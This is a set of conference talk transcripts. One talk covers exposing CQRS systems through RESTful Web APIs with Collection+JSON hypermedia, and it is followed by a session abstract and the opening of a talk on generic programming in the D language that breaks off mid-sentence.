So if you pass a JSON object, it will get bound to the customer. So we save it and we can create a response. So instead of simply returning information, we can create a response and we can say: okay, I want this to be a 201 Created and I want to set the location to this link. And if we get that customer, follow this link, we end up here. So we return the customer, but we also return a list of links. Now, obviously this doesn't really scale that well. If you have a lot of resources, perhaps you need to return customers from many different views, but you don't want to repeat all this creating of links in every single method. And there are, of course, a number of ways to refactor this; you can use base classes with hyperlinks and so on. I won't go into details on that specific case, but we'll look at another way of doing it later on. But this really is all you have to do to be hypermedia compliant, or whatever you want to call it. By the way, anyone who has questions, just raise your hand and I'll try to answer. So there are quite a few different ways of returning links and returning hypermedia. The one we saw here is basically rolling your own. So we create our own model and that's fine. That's often a good way of doing it. It can be nice to keep some of the conventions, so that links are named using the name rel. There are standardized rels: you can have rel of parent, rel of children and so on. But you can also have your own custom rels, so rel of order, perhaps. But there are other versions of hypermedia. You could actually use Atom or AtomPub. That's a great format for returning links and templates and so on. There's a lot of XML, so some people may not like that, but it's very useful. It has support for most things you need. Another option could be to use XHTML, or well, HTML, but XHTML is easier to parse. So instead of the entry and title, you can have divs or spans, and you give them a class to let the client know what content this is. There's an upside to that: you can actually browse your API using any web browser. And that could be really useful. You don't have to create a separate API browser project just to have a look at what the API has. On the other hand, HTML is not really meant to transfer data in that form. Another way, if you want to be a bit more hipster, is to do it in JSON. That's much better. There's a format called Hypertext Application Language, or HAL, which I really think is easy to read. It's nice to have if you are a JavaScript client. But there are others as well. I'm actually using Collection+JSON myself. It's a bit more verbose, but it has support for everything that AtomPub has. So we'll dig a little deeper into Collection+JSON. It's basically AtomPub, but in JSON. You have support for collections, obviously, links, query templates and also write templates. You can say that this is an order, and if you want to post one, fill out this template. It's by a guy called Mike Amundsen, who also writes a lot about these things. Let's look at some examples. This is an item in Collection+JSON. Even if you only return one item, there is always an items array. Each item has data, an href which is the URL to this particular item, and it's a name-value collection. And of course, each item has links as well. There's support for queries, so we can say that if you want to query this collection, you can use the search query. And as I said, there are templates.
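Roughly, such a document looks like this — the URLs and fields here are just made up to show the shape of the format:

{
  "collection": {
    "version": "1.0",
    "href": "http://example.org/api/customers",
    "items": [
      {
        "href": "http://example.org/api/customers/1",
        "data": [
          { "name": "name", "value": "John" },
          { "name": "city", "value": "Oslo" }
        ],
        "links": [
          { "rel": "orders", "href": "http://example.org/api/customers/1/orders" }
        ]
      }
    ],
    "queries": [
      { "rel": "search", "href": "http://example.org/api/customers", "data": [ { "name": "name", "value": "" } ] }
    ],
    "template": {
      "data": [
        { "name": "name", "value": "" },
        { "name": "city", "value": "" }
      ]
    }
  }
}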
If you want to create a new item in this collection, you fill out this template and post the whole template to the collection. Now, doing all of that in Web API by yourself is not something I would recommend, because it's a lot of code. Fortunately Glenn Block, at Microsoft, has made a media formatter for Web API that helps you do it. I thought we'd take a quick look at that. So specifically, if you just need CRUD, it's a great project. You can just derive from the new CollectionJsonController and say that I want to expose collections of, in this case, Friend. So it's a collection of Friends. You just derive and override the create, read, update, delete methods. And for the controller to know how to format this Friend, you implement a reader and a writer. So a writer implements a simple interface that takes a collection of your model objects and turns it into a Collection+JSON document. Now, you can write this by hand, and it's a lot of code, but you can simplify it a lot by using something like reflection to reflect over all the properties on your object. I've done that in a few cases. So this helps you get a correct Collection+JSON controller. So that's great for CRUD. That takes us to this part. It's a bit of a tangent, but I think it's important to talk a little about designing your resources. Resource design is all about understanding what you want in your system: which verbs you should use on which URLs, what to send back, and so on. What you usually see when you look at examples is that you just expose your domain objects as resources. If you have an order, you make an order resource. You can get an order by its id, you can get its items collection, and if you want to know the shipping status of that order, you get the shipping status of it. That's how it usually looks, and that tends to be your whole view of the world. That's fine for this part, but if you are on the back end, in the shipping department, and want to update the shipping status for that order, you want to get or put to that shipping status. You have the same URL, the same resource, but completely different paths through your code. That can be a problem. You need authorization on the shipping status in one case but not the other, and you need completely different links. If you get an order as an administrator, you want a link to the shipping status so you can update it. But if you are a customer, you shouldn't get that link. What you can do is what we do on the web: we use URLs and resources that are prefixed with different starting points. If you are a customer and want to look at an order, you go to my orders, you find the order, and you look at the shipping status there. If you are in the shipping department, you have a completely different path; it's completely separate resources you use. Okay, so that's REST. Yes? If I have an HTTP client where I get an order — you haven't mentioned RFC 5988 for hypermedia; is that something you prefer not to use? I'm not familiar with it. Is that web linking, the Link header? Yes. Well, as I said, there are many different ways of doing hypermedia. I haven't looked into that one; I've stuck with the ones I've shown here.
Yes. Well, for one thing, it's not that nice to use. Yes. Okay, so I set up the routing... Yes, exactly, the routing in the first case... Yes. In the first case, with the context-prefixed URLs, is it easy to set up the routing in Web API? Yes, definitely. It's a trade-off you have to make. On the other hand, with the other approach you get a lot of problems with things like authorization and so on, so I prefer this one. But it is an issue with Web API; it makes it a bit harder to set up the routing. Okay, let's move on. So the next part is about CQRS. So, a little show of hands: how many know what CQRS is? There we go, okay, quite a few. Keep those hands up: how many of you like CQRS? Good. How many of you have actually built a system with CQRS? Okay, those of you with your hands up, maybe I'll come back to you about a job, because we're hiring. Okay, so CQRS. I won't go into the details of the background of CQRS, but the general concept is that you want to separate how you read from how you write. And there are many reasons for that, but one important thing is that most systems have a lot of reads and rather few writes. But what do we optimize for? We often optimize for writing. We normalize our databases because, first of all, writing is super expensive — well, it isn't really anymore, but it used to be. So we make writes very fast, even though we do many more reads. That's something CQRS tries to solve. We do it with a normalized write side, possibly even event sourced — and that's something I won't go into detail on — but we also have a read side where we denormalize our databases, so it's easy and fast to read. I'm going to focus on the front of this, so the right side of this picture: the services for CQRS. And they tend to be divided into two things. You have your commands for writing. A command only passes data into the system; you don't get anything back. And you have queries for reading. Queries are only for getting data; they're not for updating anything in the system. Typical commands could look like this: a create order command, an add item to order command, and maybe a set customer address command. But there is an issue with this. In CQRS you prefer commands that actually capture the intent of the user. Set customer address doesn't really say why we want to set it. Was it a new address? Did the customer move, or are we correcting a misspelling? The latter happens a lot. So we probably don't want something like that. Instead you have a correct address command for fixing misspellings in the address, and a customer moved command, where we tell the system that this command has completely different consequences. So maybe we even want to route those to different parts of the system. Yes? Yes, it's more of a trade-off, actually. Good point. Okay. On the query side it's pretty easy. We have a read model that we've created, so an order can look like a denormalized order: you can have the order lines right in there, and maybe you have a list of orders per customer. So you can have many different views of the same data, and they can all be stored just like that in the database. So, a few properties of CQRS. It is a trade-off as well. When you issue a command and then do a read right afterwards, you might not see your changes, because the command is asynchronous and something happens on the back end: the read models get updated and then you can get the new data. So it's not request-response — well, it is for queries, of course, but not for commands.
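As a rough illustration of those intent-revealing commands and the denormalized read model just mentioned — all the class and property names here are made up for the example, not taken from the demo code:

using System;
using System.Collections.Generic;

// Commands carry data into the system and return nothing.
// Two commands that set the same fields, but capture different intent:
public class CorrectCustomerAddressCommand
{
    public Guid CustomerId { get; set; }
    public string Street { get; set; }   // fixing a misspelling, no business consequences
    public string City { get; set; }
}

public class CustomerMovedCommand
{
    public Guid CustomerId { get; set; }
    public string Street { get; set; }   // an actual move, may trigger completely different behavior
    public string City { get; set; }
}

// A denormalized view on the read side, stored ready to serve.
public class OrderView
{
    public Guid OrderId { get; set; }
    public string CustomerName { get; set; }
    public string ShippingStatus { get; set; }
    public List<OrderLineView> Lines { get; set; }
}

public class OrderLineView
{
    public string ProductName { get; set; }
    public int Quantity { get; set; }
}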
Even more importantly, you never read from the same model that you write to. So your commands and your queries look quite different. So how does that translate to REST, and how can we get the best of both worlds? I'm going to show you two different ways. The first is roughly what a REST purist might like, and the second is roughly what a CQRS purist might like. You can pick and choose. So the first one is where you simply hide the fact that it's a CQRS solution. You can expose an order collection, and you build that from the order read model you have. Obviously you have to add some links to it. If you want a single order, you do a GET with the id. This is perfect for REST, and it's a good fit for CQRS too. A GET is safe: you should be able to issue it many times without changing anything. And the same goes for CQRS queries. They are safe; they never update anything. So this is a good fit. On the write side, where you want to update things, it gets a bit trickier. In REST you usually use the same model for reading as for writing on your resources. If you want to create an order, you can post to the order collection. But if you want to update the address, well, we had two different commands for that. We could do a PUT to the address — PUT means update a resource, or put a resource at a specific location — and that matches the correct address case. For the customer moving, we can post to another resource instead; that one is more of an action. And since CQRS is asynchronous, we don't want to return a 201 Created or a 200 OK. We want a 202 Accepted. That means: I've received this, I think it looks okay, and I can give you the location if I know it, but I can't promise that if you follow that location right now there will be anything there yet. But that's what we have to work with. So let's have a look at it. This is a simple CQRS solution with view models, and everything is asynchronous. It's Greg Young's Event Store on the back end, and it's MassTransit sending the messages back. But we'll look at the front end. Have you used Fiddler? Fiddler is a necessary tool if you want to do anything like this. I'll refresh this page. I've stolen some data from a tax-free shop; I hope nobody minds. We can navigate this. We can go into Sweets, Licorice, Winegums and go to the products. So what happened? We have an API here. If we go through the API browser, we get back something that looks like this. That was the first page. We can navigate this; we can follow the links. The client knows that if there is a link, it can make it clickable, and I can follow the link to the next page. We're back at the products. And notice: it's the same URL for this page as for that one, but since the API returns different links, it looks a little different. On this page I can create an order. That does a lot of things on the back end; a lot of messages go back and forth. Let's see what it is. I have posted to... I have posted to the order.
I got a 202 Accepted back. That means it has accepted it: if you want to know more, look at /api/order with this id. It also gave me the location of the order, and things have started happening on the back end. The client tries to get the order from /api/order, and we get a 404 back, because it hasn't been created yet. Then it has been created, and now we get the order back. The order has nothing in it yet except links; I'll add more to it. A bit of code — let's look at it. The first one is the GET on /api/orders, which just returns a list of all the orders. So those are the orders. Then the order controller. The order controller has a Post, and when we create an order — again, since we want to hide the CQRS — we just post the order, and behind the scenes the controller dispatches a create order command. Okay. So that was the first way. The other way is to expose the commands themselves. A command can be a noun; it can be a resource. So we name our commands, and every command we want to expose gets its own resource. So we can have a resource called set shipping address for the set shipping address command. When we GET that resource, we return a template for it. The client fills the template out, and when the client posts the template back to that resource, it dispatches the command. You get back a 202 Accepted and the location of that specific command instance, where we can find out more information about that command. So if we GET that command instance, we can return things like, well, the content of the command, obviously, but perhaps also whether it has been processed, or whether validation failed — whatever we want to put there. So, in the demo: if we log in and go to a product, on the product level we have a command link. So we actually get that command template. There's an add item to order command, and since we are in the context of a product, the client already knows most of what goes into it. Can I click Add to Order? It will submit, dispatch — it actually posts. Post. Let's see if we have it. So it... No, that's not it. There you go. So here, I've posted the contents, so I have the order id and the product. We also have a set booking reference command that we have to look at — that's so you can get your little bag at the gate when you fly. Let's see what that looks like. We get the template for it. It's a template that says it wants an order id — we have that in the context — but it also needs a booking reference, and we don't have that. Now, the client is smart enough to see that this is one of the fields it doesn't have, so that's one of the ones we prompt for. And why shouldn't it just fill in the parts we already have from the information at hand?
So the client fills in what it already knows and only prompts for the rest, based on the information we gave it. Did you see we got the submit button here? So that's HATEOAS. That's controlling the flow of the application using the links that we return. So now, since we have a reference number, we can actually submit this order. So if we look at the links from this order, we now also have the submit order command. That's what we can use. I haven't implemented that one, so we won't try it. Ah, let's look at a bit of code for that as well. So the add item to order command has its own controller, because it's exposing its own resource. You can issue a GET that will return nothing in the contents, but since we're returning an add item to order command, the Collection+JSON serializer, the formatter, is kicking in, and that adds the template for it. And if we post to it, we simply model bind the command, make sure it looks okay, and then we dispatch it and return an accepted response with the link to the command. Let's continue. Few minutes left. So what are some pros and cons of these two different ways of exposing your CQRS API? Well, exposing commands as resources is actually quite simple and you don't need to write a lot of code. You saw I had each command with its own controller, but you can probably refactor that into using a bit more reflection or just some generics to create those. We've been using this primarily for administration interfaces. So when we create a new service, we build up a simple API browser that allows us to look at a specific order or whatever it is and see which commands this order should be able to handle, and then we can pass it commands without even having to create a client for it. So that's quite powerful. And also, if we manage to return things like error messages and which events happened as a result of this command, that's great for debugging, because that's often a problem in CQRS: you issue a command and you have no idea what's happening. Then, if you want to expose your API in public, if this is something that's going to be used for a long time by many different people and you want to be REST, you want to use hypermedia the proper way, then making your clients the way that I did, with alert pop-up boxes or things that just display stuff from the command, is probably not a good idea. You need more control in your client. One way, of course, is to make the client know about each and every command. But that may be a bit too far, because now you can't introduce a new command without also adding it to the client, which sort of defeats some of the purposes of REST, and hypermedia in particular. So on a public facing, completely awesome REST API, you'd probably want to go the first way: hiding your CQRS solution. Any questions? Yes. It doesn't have to be too bad, because in a real system you'd probably cache the templates. So the client issues one request for the template at start-up, or the first time it needs it, and then it's just in memory. So probably not a lot, at least not compared to all the other things that happen in the CQRS application. No more questions? Okay, let's do this. Since it's a hypermedia talk, we need links. So some things to look at. If you want to know more about CQRS, just to get an introduction of what it is, then Greg Young's talk from Øredev is fabulous, Unleash Your Domain. Have a look at it.
Also, Microsoft Patterns and Practices has a great book where they build an entire CQRS-based, event sourced system, called the CQRS Journey. It's free on the web. Obviously, you could read the Roy Fielding dissertation if you're having trouble sleeping. Or if you want to know more about the maturity model, Martin Fowler has a great post on that. If you're more into reading actual books, REST in Practice is a great book that discusses all of this. And there's another book on these topics being written right now; it will be very interesting to follow, so keep an eye out for that one too. As for me, if you want to look at the code, you can check out my GitHub repo. It's called Reststore. And of course, my blog will hopefully be updated with this. Follow me on Twitter. And if you are in Stockholm on a Thursday morning, come to Kodkaffe. We meet up every Thursday; we have coffee and talk about code. You can follow Kodkaffe on Twitter, or just ping me, and I'll let you know where to find us. Okay, thanks.
|
Many schoolbook examples of RESTful APIs are simple CRUD designs where you read and write using the same model. This however goes against all the principles you adhere to when doing CQRS, where you often have completely different models for reading and writing. In this session we will take a closer look at the problem and find a way to handle it without compromising too much.
|
10.5446/51537 (DOI)
|
I think we're ready to roll. Okay. So I landed at Oslo Airport yesterday and I paid half of my credit limit for the taxi after which I got here. I was really thirsty. So I go to the water place and then this lady who's like, you know, what would you like? And I say, I would like some cold sparkling water. She's like, oh, right on. This is awesome. It's like choosing one of those two choices was a genial idea. It was just perfect. A stroke of genius there. And she gives me water like I've been in the Sahara for the last six months. So she was incredibly courteous and nice about it. So I can only assume that, you know, Norwegians are all nice people and that that bodes really well for the talk. So hello, Norway. I'm Andrei Alexandrescu. I work for Facebook and I'm going to talk about the D programming language. First of all, I'm going to discuss generic programming. So before that, in fact, let's take a quick show of hands. How many of you actually use a language such as Java, C#, C++ or derivatives? Okay. So it's a kind of quite targeted audience there. This is awesome. For that matter, how many of you use C# in particular? Because that would be sort of the second. Okay. Great. So that has quite, let's say, okay mechanisms for generic programming. So let's try to define it. I'm going to go a lot by interacting with you guys. So feel free to not only interrupt me and ask questions, but actually interrupt me and, you know, make points, help my talk and make it better. So what is generic programming? How do you define it? You know, because C# has generics. Java has generics, or at least what they call it. So essentially, what would be generic programming as, you know, as an area of interest? Any ideas? Yes. Yeah. Yeah, it's like, let me think. Yes. Types? Types as parameters. So that would be a sort of a mechanism, part of generic programming. Let me attempt to give my own definition because it's many things to many people. So in my opinion, it's an activity. And it goes like this. Well, we want to find the most general representation of a given algorithm. Searching, linear search, binary search, ternary search — there is such a thing — sorting, grouping. You know, all of the classic SQL, relational algebra elements, all of that good stuff. These are activities. Like, you know, let me take an algorithm and find its most general representation. So what's the most general representation? One that uses a minimum amount of primitives. Like you go in math and say, you know, the angles of a triangle sum to 180 degrees. But that's the consequence of how many axioms? Does anyone know how many axioms? I remember very vaguely there's four, and one is like the axiom of parallels which, of course, I've proven in the sixth grade and my teacher was like, oh my God, Andrei, what's wrong with you? So you define in terms of as few axioms as possible, as few primitives as possible. Like, you know, what's the minimum amount of humanly possible data structure that can actually sort? Right? So you narrow the requirements down. Let me see if I have a laser here. Apparently I don't. So you make the minimal requirements. Why? Because it guarantees sort of the best fan-in, fan-out ratio you can ever find. And by the way, Big O encapsulation should be a crime in 52 states and in Europe as well. European Union, Norway, you know, everywhere. It should be a crime. And here's why. Actually, I was very happy.
I was sitting in the Clojure talk just earlier today and, you know, the speaker made a point that these are constant time operations or these are log time operations, and that's great, because a major issue with encapsulation of Big O is that essentially it makes it extremely easy to get to quadratic performance, which is — so quadratic on big data is essentially, you know, you don't do that, right? If you do need to do quadratic on large data, it's very explicit. So, you know, I'm going to use a quadratic algorithm with the following, you know, with the following improvements and sort of, you know, amendments and, you know, qualifications and whatnot. So it's quadratic but we kind of do it because we have to, like, you know, do like this matrix operation and whatnot. But sort of, you know, getting from linear to quadratic is a very easy step if you claim that you can access the nth element of a list with a primitive. Say, oh, yeah, I know how to get to the nth element of the list, I have to just go every step of the way, and then people are going to use that as an index in a loop, and that's going to be a disaster. Do you agree with this? Big O encapsulation — people should not do that, right? I'm very happy to see that happen because, like, when Lisp started, Lisp said we're going to do everything with lists, which is fine because lists are going to be able to represent every data structure in the universe — and they omitted the comma and what comes after it, which is: with a polynomial blow-up in access complexity, you know, in time to access. So that polynomial blow-up is actually very important. All right. So I hope I convinced you that, you know, that's something not to do. And you don't need to regress to handwritten code. This is also very important: you should leave no room below your abstraction, and unfortunately many abstractions kind of do that. They're like, you know what, I'm just going to not even claim that I'm about as good as handwritten code. If you really want speed, you got to redo this wonderful algorithm by hand in your own terms as opposed to reusing my abstraction. So this is sort of, this is like, you know, a nice definition of generic programming: find the most general representation of an algorithm and go ahead and implement it. Then you define the appropriate data types that implement those requirements, right? And finally, you're going to leverage the algorithm for ultimate reuse on whatever data structures you happen to have. And ultimately you're going to make a big profit out of it. And well, that last part depends on your entrepreneurial qualities and whatnot. But this is in my opinion what generic programming is all about. And I would add that for me personally, this is one thing I want to do. If computer science is about algorithms, then this is it. This is the bee's knees. This is what I want to be. This is what I want to do. This is kind of something that's important to my life, right? So, okay, CS is about algorithms and all that good stuff. And generic programming is about finding sort of the axiomatic representation of algorithms and structures. And therefore, you know, I want to be there. I want to be part of it, right? So I would argue that this is an important thing. Now you know the classic quote, and I kind of changed a few words in it. I said, you know, premature optimization is the root of all evil.
I kind of changed a few words to make it like weird: premature encapsulation is the root of some derangement. I didn't want to, you know, make it like all evil. I just wanted to be more reasonable about it. Premature encapsulation being exactly this kind of thing. You choose to encapsulate something in a, you know, in a data structure, sort of a generic representation, and you get to — essentially there's friction all the way. So this is sort of a problem. Like, whenever you encapsulate there's going to be this inevitable friction, and when you compose these mechanisms together, the friction is going to just add up and it's going to create problems for the users. Now let's work on a very simple warm-up question, and it's going to be very familiar to all of us. It's like, yeah, you know, I want the min function that takes two numbers or more. And it's very surprising that in this day and age — I mean, we've been doing computing for what, like, I don't know, 75 years now — it's kind of weird that people still need to discuss this; it should be a solved problem. The simplest possible algorithm one can invent, and it's kind of amazing that they still debate like, you know, how do you do a minimum? Oh, here's what you do, and you know, don't care about that, but, you know, that's going to be inefficient and that's going to be like impractical, or that's going to be, you know, difficult to use. So you know, the dream min function would be, well, let me take the, you know, minimum of many arguments, as many as I want. I want to take the minimum of A, B, whatever. I don't want to, you know, have nonsensical code like the minimum of one element or zero elements, right? I want it to work for all ordered types and conversions. So I want to take the minimum of an integer and a floating point number, and what should that give me? The minimum of an integer and a floating point number — what type should that give me back? This is a test of whether you're listening. Yeah, okay. The gentleman says floating point number. Yeah, so you've got to kind of, you know, fall back to the most general of the two. You can't think of a sort of inclusion polymorphism there. How about the minimum between a signed type and an unsigned type? So this is going to be more interesting. Yeah, so, you know, it kind of gets into a discussion already. It sounds like we're debating here, right? What the hell is going on here, right? So how about a, you know, a simpler one. The maximum between a signed type and an unsigned type. How about that? That's easy, because the maximum is always going to be unsigned, since one of the operands is unsigned — definitely it's going to be greater than or equal to zero, and therefore I'm there, right? And then it comes to, you know, the whole discussion about size and all that stuff. Like, can I represent everything representable? So we get into this interesting notion which is, you know — somebody who's into dynamic typing, you know, I lost them at the title of the slide. It's like, yeah, I know how to define min, it takes me one line and I don't care about types. Like zero, I have zero concern. I can take the minimum between a string and an apple and a banana and an orange if I so want. And it's going to give me something, and I don't care much about the type. But here we're firmly anchored in a realm where we do want to be able to do such judgments, right? Prior to runtime, we do want to issue such judgments.
And interestingly enough, it turns out that minimum and maximum are two functions whose type depends on the types of the input in interesting ways. Because again, the maximum between a signed and an unsigned is unsigned, and that doesn't apply to min. So they're not equivalent in a sense, right? So all of a sudden we get into a universe where weird things are happening and these very simple primitive functions are worth talking about, right? I can only hope by the time we all are very old and crotchety and, you know, we don't care about it anymore — it's like, yeah, I used to be a programmer, I don't care about it anymore, you know, I have a pension, whatever — so at that time, I hope nobody's going to talk about this anymore. Because yeah, I know, you know, min, it's like there, everybody has it, everybody uses it. There's no more controversy surrounding it, right? Okay. So it ought to work for everybody and we want to decline incompatible types without prejudice, right? Let's see how we can do that. So indeed, we have something very nice, and essentially we wanted to take generic programming, C++/C# style, and make it absolutely trivial to use. Essentially it's an embarrassment to not use it, because it's so simple and it brings you so much more generality. It takes just a couple of characters more than writing min for ints or for floats or for doubles. I say, well, min of left type and right type, L and R — they could be different, as I just said. So I'm going to take the left hand side, the right hand side, and I'm going to do the classic switcheroo. But here's a question for you guys. Why did I put RHS less than LHS? You know, usually you would put LHS, left hand side, less than right hand side. Why did I swap the two arguments? All right, whoever can tell me is going to get the following. I have here some delicious handwritten cards, invitations for one person to the Facebook party. It's going to be an open, you know, happy hour event. Six to eight tonight. Free food, free drinks, free chat. There's no pressure like, you know, you got to apply to Facebook or whatever. So you get a very hip location in Oslo, which is within walking distance. So here — they told me not to tell you, because then everybody's going to, you know, kind of lynch me and destroy me and get these cards, okay? So whoever answers this question is going to get one of these cards, and I have a few more. So let's see, why did I swap the order of RHS and LHS? Because the intuition is like, minimum of A and B is, oh, is A less than B, then A, otherwise B. Okay. Oh, come on, I'm going to go alone to the party. All right, so here's the answer. The answer is stability, because you could have types that are partially ordered. And what I'm saying here is, well, I'm going to swap the order of LHS and RHS only if RHS is positively less than LHS. And in all other cases, including the case in which they are not ordered, I'm going to preserve the order by returning LHS, the left-hand side. So this is sort of a solid reason, because, for example, if less than is like some case-insensitive string comparison, you want to kind of, you know, keep the left guy by default and return the right guy only if they're really ordered. So this is sort of an interesting little detail, and it's amazing, again, that we need to still talk about this. This invite remains open. So I'm going to give one for each good question I get — and, okay, all questions are good. All right.
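Here is a minimal sketch in D of the two-argument min being described — reconstructed from the description above rather than copied from the slide, so treat it as illustrative:

// Two-argument min. L and R may be different types; the result type is
// whatever the conditional expression's common type is (int and double gives double).
auto min(L, R)(L lhs, R rhs)
{
    // Swap only if rhs is *positively* less than lhs. For partially ordered types,
    // or a case-insensitive comparison, ties keep the left argument: that is the stability.
    return rhs < lhs ? rhs : lhs;
}

unittest
{
    assert(min(3, 4.5) == 3);   // mixed int/double works; the result is a double
    assert(min(4, 3) == 3);
}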
And by the way, the other speakers told me, like, Andrei, you know, Norwegian people are really socially shy. They don't ask questions and stuff. So in America, I would have gotten like a million questions already. And I'm getting some chuckles, which is good. It's a good sign. But let's ramp this up. So far so good. So we have the first min, which is like a two-liner, as expected. I mean, I wouldn't expect it to be any longer. But the nice thing is that we have true genericity here. The code expands to different functions depending on the input types, which means it's just as good as if you typed it by hand, right? The counterargument there would be, well, yeah, I have too many functions now. So it's big code. There's a lot of bloat there. And there are compiler techniques to avoid that and to kind of merge a lot of instantiations into one and stuff like that. But a function this short is going to be inlined. So actually typing min of A and B is going to be just as good as actually typing A less than B, blah, blah, blah, blah, with one evaluation for A, one evaluation for B, which is perfect. All right. Well, let's kind of ramp it up, take it one step further. Let's make it work for more than two arguments, any number of arguments. Because I can take the min of four numbers, and that's entirely reasonable. So we have this very nice variadic feature there. Oh, look at that. So I have this very nice variadic feature. I say, oh, you know, min of T dot, dot, dot, and I'm going to take a list of T's, x, and that's a sort of a compile-time construct. And I'm going to do something very interesting here. Let's say, well, during compilation, static if — so during compilation, if I happen to pass more than two arguments, I'm going to recurse. Right? So, just classic recursion, right? The min of the first two and then the rest. This dollar is like, you know, go all the way through the last element in this slice, right? So take the min of the first two and then, you know, the rest of them. Now notice that this applies only if the length is strictly greater than two, which means that x of zero is well defined, x of one is well defined, and these guys are well defined. Very nice. Well, otherwise I know what to do. I already had it on the previous slide, right? Just take the min of two elements. So well, now I can write a min of a plus b, 100, and c, or whatever I want. And there are two interesting things here to note. Number one, we're not dealing with arrays here. And that's important, because arrays already kind of bind into a specific representation, into specific operations, into a specific way of doing things. These are not arrays. These are compile-time arrays, if you wish, which do not necessarily have a representation as arrays during runtime. These are just sort of lists of types and lists of values, which is really nice. And I get to do operations during compilation, I get to do operations during runtime. Some more — and this is probably even more interesting — this is not classic recursion. So even if it says, okay, let's look at the word min: how many times do we have it? One, two, three. Three times in the definition only.
But each of these three names is a different thing, which is nice, because I use the name for the concept, not for the, you know, for the incarnation of the concept. I would go crazy if I had to define like min one, min two or whatever, right? So this is not recursion, because each of these sort of sub-invocations of min is on a shorter list of arguments, right? So I call it for, you know — the big min, I call it for 50 arguments if you so wish; let's say five arguments, more reasonable. But inside it's going to recurse, pseudo-recurse back to minimums of smaller sizes. And those mins are going to be different instantiations of the same thing. And each is going to have its own address, if you wish; it's going to be its own function, right? So all of a sudden I have this notion that I recurse during compilation, but it's not a runtime recursion. And that's good because it's efficient, right? It's as if I, again, kind of sit down and write the comparisons myself by hand, right? And I don't have the stack — if min were actually recursing at runtime, all of those frames on the stack, that would be terrible, right? It would be kind of a shameful thing to have, right? So very nice. All of a sudden I got min for many arguments. Questions so far? Yes. Sure — for God's sake, what's your consideration of stability? Haven't you forgotten to consider stability? Okay, let's see. What's your name? Michael? Michael, let's see. X0 greater than — no, because this is min and this is greater. So, okay, let's notice this. So here I used RHS less than LHS, and here I use X of 0 greater than X of 1. So it's the same thing, just I wrote it the other way, just to confuse people like you. All right. You see what I'm saying? Yeah, so essentially what I'm doing here is: if X of 1 is definitely less than X of 0, then I'm going to return X of 1, which is kind of the weird thing, and in all other cases I'm going to return X of 0. So well, I think the discussion on stability would be more interesting with a better operator, because with min it's kind of, you know, what you see is what you get. Nevertheless, Michael, congratulations. Thank you. I'll see you tonight. You got a date. All right. You're using functionality from two slides ahead, but I can tell you a little bit. Uh-huh. Ah, good question — you deserve a card or a t-shirt. What do you want? It's such a good question that you deserve either — what do you prefer? You want a t-shirt? Yeah, I'm catching a flight. Oh, okay. Never mind. Okay. So the question was, well, you have one T here, which means you kind of lose the nice — remember, like, L and R, like, you know, int, float, or, you know, unsigned int, whatever, right? So there could be nice things there, but here you're kind of losing that. Well, we're not, because T dot dot dot means a list of any types. There's one name for it, but it's a list of any — you know, you can have int, float, double, unsigned, char, whatever, right? So that's nice. So this T here stands for as many types as you want. And whenever you refer to x of zero, t of zero, whatever, it's going to kind of instantiate the thing with the appropriate type. So it all holds water. Yes? Could you mix variables and lists of variables here? Come again? Could you mix? Could you mix? You're calling, you're putting in variables, right? Because it's going to be five, a hundred, one, kind of. Right. Could you put in a list there as well? A list of variables? A list of variables.
So, okay, so here in this case, t stands for a list of types. So I can say t at zero, t at one, t at whatever. And x stands indeed for a list of variables. And indeed, x of zero is like one variable. And what was the sort of the, where we're driving at? What was the sort of ultimate? You can recall, you can recall a function, which is all m, which was named, you know, 300 and c, right? Yes. What if you put a list in the function call? What if you put a list in the function call? In that case, if you just, if I just put like, you know, let's say min and I, min, IMP or whatever, and just pass x into it, then it's going to be automatically expanded. So it's going to, there are other means to encapsulate things like that and kind of keep them together and expand them explicitly. And actually that's kind of a cool thing to, to deal with for which reason you deserve a card. I actually have a hard question. Yes. Oh my God. You want two cards? You have a girlfriend? Thank you. You could have a list of lists, right? Why wouldn't you just write a for loop? If you have lists, yeah. We could write a for loop. This is just the same because you have a static for each. So you have a static for loop that you can use. I wrote this because, you know, a function from is cool and everybody's into that. So if they say like, oh, for each one, you know, back in the 70s here. So you know, this is, oh my God, this is awesome, you know. So yeah, you could use a loop as well and it would be, there's a way to write a static loop and it's going to validate, expand in compilation. Great. Yes. What happens if you call min with just one argument? What happens if you call min with just one argument? Are you in town tonight? You got a date. Feel free to pick it up later, okay? So just a second because I didn't answer that. I gave him a card that doesn't, you know, preclude an answer. So right now we're not good there because you can call min with like zero arguments or one argument that's going to kind of explode. It's not going to do well because, for example, like for, if you go with an argument, this guy is undefined. What the hell, right? Yeah, you're going to get the compile time error, but it's not going to do well because you're going to get the compile time error, but it's not going to be like, essentially I consider it failure of defining min properly. So you're ahead one slide or couple of slides. Yes, question in the back. If you're dealing with a clause language and you would probably go in a library. Yes. That is correct. So the question was, the question was, well, number one, D is a compile language and presumably going to put min in a library, which is, so you can just Google for D program language like D lang min, you're going to find it. And if two applications are using min, or if one application happens to use like a million min or whatever with each with different number of arguments, which is kind of weird, it's not going to happen, but, you know, see what I'm saying. So there's going to be some binary code duplication there, right? So yes, you can't put min in a dynamic library. This min, you cannot put it in a dynamic library. This is a sort of an interesting trade-off. It's the other side of the trade-off, which is, well, if you want generic and if you want kind of expansion in compilation, all that good stuff, you can kind of encapsulate that in a DLL, if you wish, and kind of make it the same code, the same binary code available to everybody. 
So there's sort of, there's two extremes in this spectrum, and this is at the end of the spectrum is like pretty much everything is done in compilation, and it's as if you write the code by hand. And there's, of course, techniques that take you to all the way to the other end, which is, well, I want to actually write the function and lose some of the benefits, but at the same time gain some better binary reuse. So these things are fundamental intention. Are you in time tonight? Okay. T-shirt? Okay. All right. So, so far so good. There's one more question down here. Okay. Up there? Okay. Let me know. Yes? Is there any way to enforce such a sense in the veritable argument? Is there a way to enforce that T is actually all T's, you know? Yeah. Actually, there's a predicate called all satisfy, which is implemented in the library, and it's, you know, all satisfied T's and or whatever. Okay. Awesome. All right. So we're at, you know, you were on slide ahead because we want to reject nonsensical calls. We want to say, well, I'm going to accept min of T's, only if the length of x is greater than 1. And here we stumble upon a very interesting feature of D, which is I can restrict statically any function I want in any way I want with anybody predicate. Right? So all of a sudden I can say, well, you know, I want to take min only if the length of these guys is 1, and if not, min just disappears. There's no min for one argument or zero arguments. It doesn't exist, right? Because it kind of, you know, takes it away from the food chain, which is nice because if I, at some point I want to define for whatever reasons my own function min that takes one argument, I could do so because this min is not going to compete with that guy. Right? So this is sort of good encapsulation of modules. So I just said that. And you know, of course, we need to do more work, which would be sort of some sort of interesting thing to talk about. Like, well, I want to kind of say if x length is greater than 1 and if, so, all 